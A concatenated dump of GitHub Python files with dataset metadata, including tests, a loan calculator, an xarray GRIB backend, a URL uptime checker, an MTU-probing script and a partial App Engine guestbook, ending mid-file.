pytest.param(\n 200,\n 80,\n PLACE,\n marks=pytest.mark.experiments3(\n **SUGGEST_PARAMS,\n default_value={\n 'routehistory_max_size': 80,\n 'min_dist_from_userplace': 200,\n 'min_dist_from_completion_point': 2000,\n 'min_near_points_size': 3,\n 'max_weeks_count_from_ride': 12,\n },\n ),\n ),\n pytest.param(\n 500,\n 30,\n [],\n marks=pytest.mark.experiments3(\n **SUGGEST_PARAMS,\n default_value={\n 'routehistory_max_size': 30,\n 'min_dist_from_userplace': 200,\n 'min_dist_from_completion_point': 2000,\n 'min_near_points_size': 3,\n 'max_weeks_count_from_ride': 12,\n },\n ),\n ),\n pytest.param(\n 200,\n 80,\n [],\n marks=pytest.mark.experiments3(\n **SUGGEST_PARAMS,\n default_value={\n 'routehistory_max_size': 80,\n 'min_dist_from_userplace': 20000,\n 'min_dist_from_completion_point': 2000,\n 'min_near_points_size': 3,\n 'max_weeks_count_from_ride': 12,\n },\n ),\n ),\n pytest.param(\n 200,\n 80,\n [],\n marks=pytest.mark.experiments3(\n **SUGGEST_PARAMS,\n default_value={\n 'routehistory_max_size': 80,\n 'min_dist_from_userplace': 200,\n 'min_dist_from_completion_point': 2000,\n 'min_near_points_size': 4,\n 'max_weeks_count_from_ride': 12,\n },\n ),\n ),\n pytest.param(\n 200,\n 80,\n [],\n marks=pytest.mark.experiments3(\n **SUGGEST_PARAMS,\n default_value={\n 'routehistory_max_size': 80,\n 'min_dist_from_userplace': 200,\n 'min_dist_from_completion_point': 200,\n 'min_near_points_size': 3,\n 'max_weeks_count_from_ride': 12,\n },\n ),\n ),\n pytest.param(\n 200,\n 80,\n [],\n marks=pytest.mark.experiments3(\n **SUGGEST_PARAMS,\n default_value={\n 'routehistory_max_size': 80,\n 'min_dist_from_userplace': 200,\n 'min_dist_from_completion_point': 200,\n 'min_near_points_size': 3,\n 'max_weeks_count_from_ride': 1,\n },\n ),\n ),\n ],\n ids=[\n 'simple_suggest_userplace',\n 'routehistory_error',\n 'close_to_userplace',\n 'min_points_count',\n 'min_distance_to_completion_point',\n 'max_weeks_count',\n ],\n)\n@pytest.mark.now('2022-05-12T17:38:12.955+0000')\nasync def test_suggest_userplace(\n taxi_userplaces,\n load_json,\n mockserver,\n status_code,\n max_results,\n yamaps,\n response_place,\n):\n @mockserver.json_handler('/routehistory/routehistory/get')\n def _mock_routehistory(request):\n assert request.json['max_results'] == max_results\n if status_code == 500:\n return mockserver.make_response(status=500)\n return load_json('routehistory_response.json')\n\n yamaps.add_fmt_geo_object(YAMAPS_ADDRESS)\n\n response = await taxi_userplaces.post(\n '4.0/userplaces/suggested-points',\n headers={\n 'X-YaTaxi-UserId': USER_ID,\n 'X-YaTaxi-PhoneId': DEFAULT_PHONE_ID,\n 'Accept-Language': 'ru',\n 'X-Yandex-UID': DEFAULT_UID,\n 'X-Request-Application': 'app_name=yango_android',\n },\n json={'coordinates': [37.586634, 55.736716]},\n )\n assert response.status_code == status_code\n if status_code == 200:\n assert response.json()['places'] == response_place\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests_userplaces/test_userplaces_suggest.py","file_name":"test_userplaces_suggest.py","file_ext":"py","file_size_in_byte":6003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"20158267188","text":"from requests import post\nfrom models.response import ErrorResponse, PlaceOrderSuccessResponse\nfrom models.request import OrderAttributes, OrderFields, CreateOrderRequest\n\n\ndef createOrderRequest(app, consumer_id, name):\n headers = {\n 'Authorization': f'Bearer {app.config[\"ACCESS_TOKEN\"]}',\n \"accept\": \"application/json\",\n \"content-type\": \"application/json\",\n }\n\n payload = CreateOrderRequest(\n data=OrderFields(\n type=\"order\",\n attributes=OrderAttributes(\n consumer_id=f'{consumer_id}',\n portfolio_id=app.config[\"PORTFOLIO_ID\"],\n sku=app.config[\"SKU\"]\n )\n )\n ).json()\n\n # Make request to /data-access/orders/\n r = post(app.config[\"ORDER_DATA_URL\"],\n headers=headers, data=payload)\n\n # Make response json format\n response_body = r.json()\n\n if not r.ok:\n app.logger.error(\n \"Error making order. Response Body: %s\", response_body)\n return ErrorResponse(\n status=\"FAILED\",\n errors=[\n {\n \"status\": response_body[\"status_code\"],\n \"title\": response_body[\"status_message\"],\n \"detail\": response_body[\"status_details\"]\n }\n ])\n\n data = response_body['data']\n attributes = response_body['data']['attributes']\n app.logger.info(\n \"Success making order. Response Body: %s\", response_body)\n return PlaceOrderSuccessResponse(\n consumer_id=consumer_id,\n order_id=data[\"id\"],\n name=name,\n sku=app.config[\"SKU\"],\n status=attributes[\"status\"]\n )\n","repo_name":"bloomcredit/Bloom-Sample-Apps","sub_path":"manual-report-viewer/api/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37354694818","text":"import math\nimport sys\narguments = sys.argv\n\ndef data_input():\n loan_type = ''\n principal = 0\n payment = 0\n periods = 0\n interest = 0\n for element in arguments: # retrieves different parameters from the command line\n if '--type=' in element:\n loan_type += element.replace('--type=', '')\n elif '--principal=' in element:\n principal += int(element.replace('--principal=', ''))\n elif '--payment=' in element:\n payment += int(element.replace('--payment=', ''))\n elif '--periods=' in element:\n periods += int(element.replace('--periods=', ''))\n elif '--interest=' in element:\n interest += float(element.replace('--interest=', ''))\n if len(arguments) >= 5 and (type == 'annuity' or type == 'diff'): # checks parameters' correctness, enters the right module\n if principal == 0 and type == 'annuity' and payment > 0 and periods > 0 and interest > 0:\n calculate_loan_principal(payment, periods, interest)\n elif payment == 0 and principal > 0 and periods > 0 and interest > 0:\n calculate_monthly_payment(type, principal, periods, interest)\n elif periods == 0 and type == 'annuity' and principal > 0 and payment > 0 and interest > 0:\n calculate_payments_number(principal, payment, interest)\n else:\n print('Incorrect parameters')\n else:\n print('Incorrect parameters')\n\ndef calculate_payments_number(principal, payment, interest): # calculates number of payments\n nominal_interest = interest / (12 * 100)\n periods = math.ceil(math.log(payment / (payment - (nominal_interest * principal)), 1 + nominal_interest))\n if periods < 12:\n print(f'It will take {periods} months to repay the loan')\n elif periods == 12:\n print(f'It will take 1 year to repay the loan')\n elif 12 < periods < 24:\n print(f'It will take 1 year and {periods % 12} months to repay the loan')\n else:\n if periods % 12 == 0:\n print(f'It will take {int(periods / 12)} years to repay the loan')\n else:\n print(f'It will take {periods // 12} years and {periods % 12}to repay the loan')\n print(f'Overpayment = {int(payment * periods - principal)}')\n\ndef calculate_monthly_payment(loan_type, principal, periods, interest): # calculates monthly payment\n nominal_interest = interest / (12 * 100)\n if loan_type == 'annuity': # monthly annuity payment\n annuity_payment = math.ceil(principal * (nominal_interest * math.pow(1 + nominal_interest, periods)) / ((pow(1 + nominal_interest, periods)) - 1))\n print(f'Your monthly payment = {annuity_payment}!')\n print(f'Overpayment = {annuity_payment * periods - principal}')\n elif loan_type == 'diff': # monthly differentiate payment\n diff_payment_sum = 0.0\n for i in range(1, periods + 1):\n diff_payment = (principal / periods) + (nominal_interest * (principal - ((principal * (i - 1)) / periods)))\n print(f'Month {i}: payment is {math.ceil(diff_payment)}')\n diff_payment_sum += math.ceil(diff_payment)\n print(f'\\nOverpayment = {int(diff_payment_sum - principal)}')\n\ndef calculate_loan_principal(payment, periods, interest): # calculates loan principal\n nominal_interest = interest / (12 * 100)\n principal = payment / ((nominal_interest * math.pow(1 + nominal_interest, periods)) / ((pow(1 + nominal_interest, periods)) - 1))\n print(f'Your loan principal = {int(principal)}!')\n print(f'Overpayment = {math.ceil(payment * periods - principal)}')\n\ndata_input()","repo_name":"danban19/loan_calculator","sub_path":"creditcalc.py","file_name":"creditcalc.py","file_ext":"py","file_size_in_byte":3617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4125288769","text":"import pandas as pd\nfrom PIL import Image\nimport os\n\ndef analyzer(path_to_images='../data/images', save_to=\"../data/info.csv\"):\n filenames = os.listdir(path_to_images)\n sizes = {}\n for filename in filenames:\n image = Image.open(os.path.join(path_to_images, filename))\n sizes[image.size] = sizes.get(image.size, 0) + 1\n sizes = sorted(sizes.items(), key=lambda x: x[1], reverse=True)\n df = pd.DataFrame(sizes, columns=[\"size\", \"count\"])\n df.to_csv(save_to)\n\nif __name__ == \"__main__\":\n analyzer()\n","repo_name":"ThePaniv/Google-Landmark-Retrieval-Challenge","sub_path":"scripts/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36932614848","text":"import os\nimport typing as T\nfrom distutils.version import LooseVersion\n\nimport numpy as np # type: ignore\nimport xarray as xr\n\nfrom . import dataset\n\nif LooseVersion(xr.__version__) <= \"0.17.0\":\n raise ImportError(\"xarray_plugin module needs xarray version >= 0.18+\")\n\nfrom xarray.backends.common import (\n BACKEND_ENTRYPOINTS,\n AbstractDataStore,\n BackendArray,\n BackendEntrypoint,\n)\n\n# FIXME: Add a dedicated lock, even if ecCodes is supposed to be thread-safe\n# in most circumstances. See:\n# https://confluence.ecmwf.int/display/ECC/Frequently+Asked+Questions\nECCODES_LOCK = xr.backends.locks.SerializableLock() # type: ignore\n\n\nclass CfGribDataStore(AbstractDataStore):\n \"\"\"\n Implements the ``xr.AbstractDataStore`` read-only API for a GRIB file.\n \"\"\"\n\n def __init__(\n self,\n filename: str,\n lock: T.Union[T.ContextManager[T.Any], None] = None,\n **backend_kwargs: T.Any,\n ):\n if lock is None:\n lock = ECCODES_LOCK\n self.lock = xr.backends.locks.ensure_lock(lock) # type: ignore\n self.ds = dataset.open_file(filename, **backend_kwargs)\n\n def open_store_variable(self, var: dataset.Variable,) -> xr.Variable:\n if isinstance(var.data, np.ndarray):\n data = var.data\n else:\n wrapped_array = CfGribArrayWrapper(self, var.data)\n data = xr.core.indexing.LazilyIndexedArray(wrapped_array) # type: ignore\n encoding = self.ds.encoding.copy()\n encoding[\"original_shape\"] = var.data.shape\n\n return xr.Variable(var.dimensions, data, var.attributes, encoding) # type: ignore\n\n def get_variables(self) -> xr.core.utils.Frozen[T.Any, T.Any]:\n return xr.core.utils.FrozenDict(\n (k, self.open_store_variable(v)) for k, v in self.ds.variables.items()\n )\n\n def get_attrs(self) -> xr.core.utils.Frozen[T.Any, T.Any]:\n return xr.core.utils.Frozen(self.ds.attributes)\n\n def get_dimensions(self) -> xr.core.utils.Frozen[T.Any, T.Any]:\n return xr.core.utils.Frozen(self.ds.dimensions)\n\n def get_encoding(self) -> T.Dict[str, T.Set[str]]:\n dims = self.get_dimensions()\n encoding = {\"unlimited_dims\": {k for k, v in dims.items() if v is None}}\n return encoding\n\n\nclass CfGribBackend(BackendEntrypoint):\n def guess_can_open(self, store_spec: str,) -> bool:\n try:\n _, ext = os.path.splitext(store_spec)\n except TypeError:\n return False\n return ext in {\".grib\", \".grib2\", \".grb\", \".grb2\"}\n\n def open_dataset(\n self,\n filename_or_obj: str,\n *,\n mask_and_scale: bool = True,\n decode_times: bool = True,\n concat_characters: bool = True,\n decode_coords: bool = True,\n drop_variables: T.Union[T.Iterable[str], None] = None,\n use_cftime: T.Union[bool, None] = None,\n decode_timedelta: T.Union[bool, None] = None,\n lock: T.Union[T.ContextManager[T.Any], None] = None,\n indexpath: str = \"{path}.{short_hash}.idx\",\n filter_by_keys: T.Dict[str, T.Any] = {},\n read_keys: T.Iterable[str] = (),\n encode_cf: T.Sequence[str] = (\"parameter\", \"time\", \"geography\", \"vertical\"),\n squeeze: bool = True,\n time_dims: T.Iterable[str] = (\"time\", \"step\"),\n errors: str = \"warn\",\n extra_coords: T.Dict[str, str] = {},\n ) -> xr.Dataset:\n\n store = CfGribDataStore(\n filename_or_obj,\n indexpath=indexpath,\n filter_by_keys=filter_by_keys,\n read_keys=read_keys,\n encode_cf=encode_cf,\n squeeze=squeeze,\n time_dims=time_dims,\n lock=lock,\n errors=errors,\n extra_coords=extra_coords,\n )\n with xr.core.utils.close_on_error(store):\n vars, attrs = store.load() # type: ignore\n encoding = store.get_encoding()\n vars, attrs, coord_names = xr.conventions.decode_cf_variables(\n vars,\n attrs,\n mask_and_scale=mask_and_scale,\n decode_times=decode_times,\n concat_characters=concat_characters,\n decode_coords=decode_coords,\n drop_variables=drop_variables,\n use_cftime=use_cftime,\n decode_timedelta=decode_timedelta,\n ) # type: ignore\n\n ds = xr.Dataset(vars, attrs=attrs)\n ds = ds.set_coords(coord_names.intersection(vars))\n ds.set_close(store.close)\n ds.encoding = encoding\n return ds\n\n\nclass CfGribArrayWrapper(BackendArray):\n def __init__(\n self, datastore: CfGribDataStore, array: T.Union[dataset.OnDiskArray, np.ndarray]\n ):\n self.datastore = datastore\n self.shape = array.shape\n self.dtype = array.dtype\n self.array = array\n\n def __getitem__(self, key: xr.core.indexing.ExplicitIndexer,) -> np.ndarray:\n return xr.core.indexing.explicit_indexing_adapter(\n key, self.shape, xr.core.indexing.IndexingSupport.BASIC, self._getitem\n )\n\n def _getitem(self, key: T.Tuple[T.Any, ...],) -> np.ndarray:\n with self.datastore.lock:\n return self.array[key]\n","repo_name":"deepin-community/cfgrib","sub_path":"cfgrib/xarray_plugin.py","file_name":"xarray_plugin.py","file_ext":"py","file_size_in_byte":5261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"38845290925","text":"#!/usr/bin/python3\n\n# Python script to report status of a URL\n# Sends Slack alert if the request returns anything other than 200\n# Or is unreachable\n\nimport requests\nimport sys\nimport argparse\nimport configparser\nimport json\n\n#Argument parsing\nparser = argparse.ArgumentParser(description=\"Checks uptime for specified URL\")\nparser.add_argument(\"url\", help=\"URL to check\")\nparser.add_argument(\"-v\", \"--verbose\", help=\"Verbose\", action=\"store_true\")\nargs = parser.parse_args()\n\n#Config parsing\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\nwebhook = config.get('Main', 'webhook')\n\n#Check URL format\nif not args.url.startswith('http'):\n print(\"Please provide schema: http:// or https://\")\n exit(1)\n\n#Check URL status\nif(args.verbose):\n print(\"Checking URL\")\ntry:\n r = requests.head(args.url)\n if(args.verbose):\n print(\"Status Code:\",r.status_code)\n code = str(r.status_code)\n if r.status_code == 200: #Connection Okay\n if(args.verbose):\n print(\"Condition okay!\")\n else:\n if(args.verbose):\n print(\"Condition bad!\")\n statusMsg = \" status code returning \"\n message = client.messages.create(\n to=toNum,\n from_=fromNum,\n body=args.url+statusMsg+code)\nexcept requests.ConnectionError:\n if(args.verbose):\n print(\"Failed to connect, check URL for errors\")\n slack_data = 'URGENT ALERT! Cannot connect to: ' + args.url\n slack_response = requests.post(\n webhook, data=json.dumps({'text': slack_data}),\n headers={'Content-Type': 'application/json'})\n if slack_response.status_code is not 200:\n raise ValueError(\n 'Request to slack returned an error %s, the response is:\\n%s'\n % (slack_response.status_code, slack_response.text))\n\n","repo_name":"cskinner74/DownAlert","sub_path":"DownAlert.py","file_name":"DownAlert.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"25891590622","text":"#!/usr/bin/python3\n\nimport validators\nimport subprocess\nimport sys\nimport os\nimport ipaddress\n\n\ndestination = os.getenv(\"DESTINATION_ADDRESS\")\ntimout = os.getenv(\"TIMEOUT\")\nmax_msg_sz = os.getenv(\"MAX_MTU\")\nif max_msg_sz is None:\n max_msg_sz = '10000'\n\nif destination is None or \\\n (timout is not None and not timout.isdigit()) or \\\n (max_msg_sz is not None and not max_msg_sz.isdigit()):\n print(destination, timout)\n print(\"Wait run as sudo docker run -e DESTINATION_ADDRESS='destination ip / public domain name' [-e TIMEOUT='timeout in ms'] [-e MAX_MTU='max boarder of searching default 10000'] mtu_search\")\n exit(0)\nelse:\n max_msg_sz = int(max_msg_sz)\n\nis_valid_ip = False\nis_valid_domain = False\n\n# check ip correctness\ntry:\n ip = ipaddress.ip_address(destination)\n is_valid_ip = True\nexcept Exception:\n pass\n\n# check domain correctness:\ntry:\n validators.domain(destination)\n is_valid_domain = True\nexcept Exception:\n pass\n\nif not is_valid_domain and not is_valid_ip:\n print(\"check correctness of input %s\" % destination)\n exit(1)\n\n\n# check destination\ncommand = ['ping', '-c', '1', '-W']\nif timout is not None:\n command += [str(timout)]\nelse:\n command += ['1']\ncommand.append(destination)\n\ntry:\n response = subprocess.run(command, capture_output=True)\n is_ping_work = response.returncode == 0\nexcept Exception as ex:\n is_ping_work = False\n\nif not is_ping_work:\n print(\"desitanion is unreachable for ping. Posibly impc disable or server doesn't exist on correct adress\")\n exit(1)\n\nL = -1\nR = max_msg_sz + 1\nreal_mtu = None\nwhile L + 1 < R:\n mess_sz = (L + R) // 2\n print('try mtu=%d' % mess_sz)\n command = ['ping', '-c', '1', '-s', str(mess_sz), '-M', 'do']\n if timout is not None:\n command += ['-W', str(timout)]\n command.append(destination)\n try:\n response = subprocess.run(command, capture_output=True)\n stdout = response.stdout.decode()\n try_to_find = f'{mess_sz}('\n\n real_sz = stdout[stdout.find(try_to_find):]\n real_sz = real_sz[len(try_to_find):real_sz.find(')')]\n\n if response.returncode != 0:\n if 'too long' in response.stderr.decode():\n R = mess_sz\n elif len(response.stderr.decode()) == 0:\n print(response)\n print(\"Timeout occur but host may be reachable, you can add timeout as an arg\")\n R = mess_sz\n else:\n print(\"Try to reduce size due to unknown error from ping:\", response)\n R = mess_sz\n else:\n L = mess_sz\n real_mtu = real_sz\n except Exception:\n R = mess_sz\n print(\"Smth went wrong. Try to erase msg size:\", response)\n\nif real_mtu is None:\n print(\"host is unreachable\")\nelse:\n print('mtu size is', real_mtu)\n ","repo_name":"Ksenia-C/networks_labs","sub_path":"lab2/mtu_searcher.py","file_name":"mtu_searcher.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40882753562","text":"def ReturnsNthRoot(integer, n):\n # Adapted from page 25 in book\n root = 0 \n while root**n < abs(integer): \n root = root + 1\n if root**n != abs(integer):\n return\n else:\n if integer < 0:\n root = -root\n return root\n\ninteger = int(input('Enter an integer: '))\nmaxpwr = 5 \nminpwr = 1\n\nwhile minpwr < maxpwr: \n minpwr = minpwr + 1\n root = ReturnsNthRoot(integer, minpwr)\n if root != None:\n print(\"root: {0} pwr: {1}\".format(root, minpwr))\n else:\n print(\"No roots exist for pwr: {0}\".format(minpwr))\n \n","repo_name":"ppysjp93/Introduction-to-Computation-and-Programming-Using-Python-","sub_path":"Chapters/Chapter3/FingerExercises/RootPower/RootPowerSolution/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24759563233","text":"\"\"\"\nAuthor: Mickaël Descamps - Mineyou\nEmail : mickael.descamps@mineyou.fr\nProjet : Patio numérique\nOrganisation : FougèresLab\nDesc: description\n\npip.py (c) 2021\nCreated: 2021-03-04T20:31:56.992Z\n\"\"\"\n\nimport subprocess\n\ntry:\n result = subprocess.run(\"sudo apt-get install python3-pip\",stdout=subprocess.PIPE,shell=True)\nexcept BaseException as ex:\n print(\"Erreur installation pip\" + repr(ex))\nelse:\n print(\"Installation pip réussie\")\n","repo_name":"fougereslab/Patio-Num-rique","sub_path":"setup/pip.py","file_name":"pip.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"507822577","text":"import boto3\nimport os\n\n\nDATA_SRC= os.getenv('DATA_SRC')\ns3 = boto3.client(\"s3\")\n\n\ndef lambda_handler(event, context):\n obj = s3.get_object(Bucket=DATA_SRC, Key=\"CBOFS/Group_001.geojson\")\n body = obj[\"Body\"].read()\n return {\n 'statusCode': 200,\n 'body': body\n }\n","repo_name":"Streamlines-UNH/tide-maker","sub_path":"functions/map_get_retriever/map_get_retriever.py","file_name":"map_get_retriever.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70326128212","text":"#!/usr/bin/env python \n# Author: Christopher Bull. \n# Affiliation: British Antarctic Survey\n# Cambridge, UK\n# Contact: chbull@bas.ac.uk\n# www: christopherbull.com.au\n# Date created: Wed, 22 Jan 2020 17:19:00\n# Machine created on: SB2Vbox\n#\n\n\"\"\"\nPython module to contain useful shared parameters\n\"\"\"\n\nfrom cb2logger import *\nimport collections\nimport os\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes, zoomed_inset_axes\nfrom mpl_toolkits.axes_grid1.anchored_artists import AnchoredSizeBar\nimport matplotlib.pyplot as plt\n\ncast_type=collections.OrderedDict()\n\n\ncast_type['001']=['test','']\n# sheldon cove\ncast_type['002']=['icebergs','SC0'] # no ladcp data\ncast_type['003']=['racetrax','SC0']\ncast_type['004']=['racetrax','SC0']\ncast_type['005']=['icebergs','SC1']\ncast_type['006']=['racetrax','SC1']\ncast_type['007']=['racetrax','SC1']\ncast_type['008']=['icebergs','SC2']\ncast_type['009']=['icebergs','SCA']\ncast_type['010']=['racetrax','SCA']\ncast_type['011']=['racetrax','SCA']\ncast_type['012']=['icebergs','SCB']\ncast_type['013']=['icebergs','SC6']\ncast_type['014']=['icebergs','IF1']\ncast_type['015']=['icebergs','IF2']\ncast_type['016']=['icebergs','IF3']\ncast_type['017']=['icebergs','SCC']\ncast_type['018']=['racetrax','SCC']\ncast_type['019']=['racetrax','SCC']\ncast_type['020']=['icebergs','SCD']\ncast_type['021']=['racetrax','SCE']\ncast_type['022']=['racetrax','SCE']\ncast_type['023']=['icebergs','SCE']\n\n# borgen bay\ncast_type['024']=['icebergs','BB0']\ncast_type['025']=['racetrax','BB0']\ncast_type['026']=['racetrax','BB0']\ncast_type['027']=['icebergs','BBX']\ncast_type['028']=['icebergs','BBA']\ncast_type['029']=['racetrax','BBA']\ncast_type['030']=['racetrax','BBA']\ncast_type['031']=['icebergs','BBC']\ncast_type['032']=['racetrax','BBC']\ncast_type['033']=['racetrax','BBC']\ncast_type['034']=['icebergs','BB-ICE3']\ncast_type['035']=['icebergs','BB-ICE4']\ncast_type['036']=['icebergs','BB-ICE2']\ncast_type['037']=['icebergs','BB-ICE1']\ncast_type['038']=['icebergs','BBD']\ncast_type['039']=['racetrax','BBD']\ncast_type['040']=['racetrax','BBD']\ncast_type['041']=['icebergs','BBE']\ncast_type['042']=['racetrax','BBE']\ncast_type['043']=['racetrax','BBE']\ncast_type['044']=['icebergs','BB1']\ncast_type['045']=['EK80cal','']\ncast_type['046']=['icebergs','BBB']\n\n# marian cove\ncast_type['047']=['icebergs','MC1']\ncast_type['048']=['racetrax','MC1']\ncast_type['049']=['icebergs','MC0']\ncast_type['050']=['icebergs','MC2']\ncast_type['051']=['icebergs','MCA']\ncast_type['052']=['racetrax','MCA']\ncast_type['053']=['icebergs','MCB']\ncast_type['054']=['racetrax','MCB']\ncast_type['055']=['icebergs','MCC']\ncast_type['056']=['racetrax','MCC']\ncast_type['057']=['icebergs','MC4'] #4 was possibly a typo?\ncast_type['058']=['icebergs','MCD']\ncast_type['059']=['racetrax','MCD']\ncast_type['060']=['icebergs','MC-ICE1']\ncast_type['061']=['icebergs','MC-ICE2']\ncast_type['062']=['racetrax','MCE']\ncast_type['063']=['icebergs','MCE']\n\ndef inset_title_box(ax,title,bwidth=\"20%\",location=1):\n \"\"\"\n Function that puts title of subplot in a box\n \n :ax: Name of matplotlib axis to add inset title text box too\n :title: 'string to put inside text box'\n :returns: @todo\n \"\"\"\n\n axins = inset_axes(ax,\n width=bwidth, # width = 30% of parent_bbox\n height=.30, # height : 1 inch\n loc=location)\n\n plt.setp(axins.get_xticklabels(), visible=False)\n plt.setp(axins.get_yticklabels(), visible=False)\n axins.set_xticks([])\n axins.set_yticks([])\n\n axins.text(0.5,0.3,title,\n horizontalalignment='center',\n transform=axins.transAxes,size=10)\n\ndef mkdir(p):\n \"\"\"make directory of path that is passed\"\"\"\n try:\n os.makedirs(p)\n lg.info(\"output folder: \"+p+ \" does not exist, we will make one.\")\n except OSError as exc: # Python >2.5\n import errno\n if exc.errno == errno.EEXIST and os.path.isdir(p):\n pass\n else: raise\n\nif __name__ == \"__main__\": \n print('not supposed to be run like this!')\n # LogStart('',fout=False)\n # #put useful code here!\n\n # lg.info('')\n # localtime = time.asctime( time.localtime(time.time()) )\n # lg.info(\"Local current time : \"+ str(localtime))\n # lg.info('SCRIPT ended')\n","repo_name":"chrisb13/LADCPproc","sub_path":"plot_casts/shareme.py","file_name":"shareme.py","file_ext":"py","file_size_in_byte":4312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42100242043","text":"import argparse\n\n\nclass CommandLine(object):\n\n @staticmethod\n def str2bool(v):\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')\n","repo_name":"umbertogriffo/fast-near-duplicate-image-search","sub_path":"src/deduplication/utils/CommandLine.py","file_name":"CommandLine.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"fa","doc_type":"code","stars":131,"dataset":"github-code","pt":"66"} +{"seq_id":"2058551010","text":"\"\"\"\nAll parameters for an evolutionary run\nare stored in here\n\"\"\"\n\n#####################\n# GA parameters\n#####################\npop_size = 10\nmutation_rate = 0.05\nsmall_mutation_rate = 0.01\ncrossover_rate = 0.00\nmax_generations = 1000\nrobot_system = \"aruduino\"\nuse_brain_archive = False\nuse_run_archive = False\nuse_sensory_conditions = False\ndraw_molecules = True\n#####################\n# Simulation parameters\n#####################\ntime_step_length = 0.2\ntime_steps_per_evaluation = 40\n\n#####################\n# Atom parameters\n#####################\n\nmin_message_delay = 1\nmax_message_delay = 20\n\nmin_time_active = 1\nmax_time_active = 40\n\nmin_sensors_in_s_atom = 1\nmax_sensors_in_s_atom = 3\nmin_motors_in_m_atom = 1\nmax_motors_in_m_atom = 4\n\nLWPR = False\n\n#####################\n# Nao parameters\n#####################\nrobot_port = 9560\ngps_server_port = 13375\ngps_client_port = 1025\nuse_distance = True\nnao_starting_position = \"suppine\"\n\n#####################\n# Webots parameters\n#####################\nwebots_timestep_length = 200\n\n#####################\n# Arduino parameters\n#####################\narduino_address = '/dev/tty.usbmodem1421'\narduino_output_pins = [1,2,3,4]\narduino_input_pins = [0,1,2]\narduino_limit = False\narduino_normalise = True\n\nsensor_normalisation_values = {\n\t\t\t\t\t\t\t\t0:[400,700],\n\t\t\t\t\t\t\t\t1:[400,700],\n\t\t\t\t\t\t\t\t2:[400,700]\n\t\t\t\t\t\t\t\t}\nmotor_normalisation_values = {\n\t\t\t\t\t\t\t\t0:[20,100],\n\t\t\t\t\t\t\t\t1:[20,100],\n\t\t\t\t\t\t\t\t2:[20,100],\n\t\t\t\t\t\t\t\t3:[20,100],\n\t\t\t\t\t\t\t\t}\n\n","repo_name":"alexanderchurchill/EROS","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"8575861488","text":"import hcsc\r\nimport photon_in\r\nimport test\r\nimport nu\r\n\r\n\r\ndef main():\r\n scell = hcsc.hcsc()\r\n ph_in = photon_in.Photon_in()\r\n ph_in.c = 10\r\n scell.shine(ph_in)\r\n scell.display_attributes()\r\n print(\"Jout:{:.3f}(A/m^2)\".format(scell.Jouthc(0.2/2*nu.eV)[0]))\r\n print(\"Pout:{:.3f}(W/m^2)\".format(scell.Pouthc(0.2/2*nu.eV)[0]))\r\n # print(\"MaxPout:{:.3f}(W/m^2)\".format(scell.maxPouthc()[0]))\r\n\r\n test.IV(scell)\r\n test.PV(scell)\r\n test.maxPouthc_opt_ESC(scell, 50)\r\n return\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"thBoo39/hot-carrier-solar-cell-particle-energy-balance-solver","sub_path":"user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"12615630864","text":"import os\r\nimport sys\r\nfrom google.appengine.ext.webapp import template\r\n\r\nimport cgi\r\nimport datetime\r\nimport wsgiref.handlers\r\nimport logging\r\n\r\nfrom google.appengine.ext import db\r\nfrom google.appengine.api import users\r\nfrom google.appengine.ext import webapp\r\n\r\nimport pojo\r\n#sys.path.append('utils')\r\n\r\n\r\nclass MainPage(webapp.RequestHandler):\r\n def get(self):\r\n size = 10\r\n currpage = self.request.get('p')\r\n if currpage == '':\r\n currpage = '1'\r\n page = int(currpage)\r\n offset = (page-1)*size\r\n \r\n greetings = db.GqlQuery(\"SELECT * \"\r\n \"FROM Greeting \"\r\n \"ORDER BY date DESC\")\r\n #Greeting.all().order('-date')\r\n\r\n if users.get_current_user():\r\n url = users.create_logout_url(self.request.uri)\r\n url_linktext = 'Logout'\r\n else:\r\n url = users.create_login_url(self.request.uri)\r\n url_linktext = 'Login'\r\n\r\n nums = greetings.count()\r\n\r\n pagestr = ''\r\n if page == 1 :\r\n if nums > size :\r\n pagestr = 'Next'\r\n else :\r\n pagestr = '1'\r\n else :\r\n pagestr = 'Pre'\r\n if nums > size*page :\r\n pagestr += '      ' + ' Next'\r\n\r\n template_values = {\r\n 'greetings': greetings.fetch(size,offset),\r\n 'url': url,\r\n 'url_linktext': url_linktext,\r\n 'pagestr': 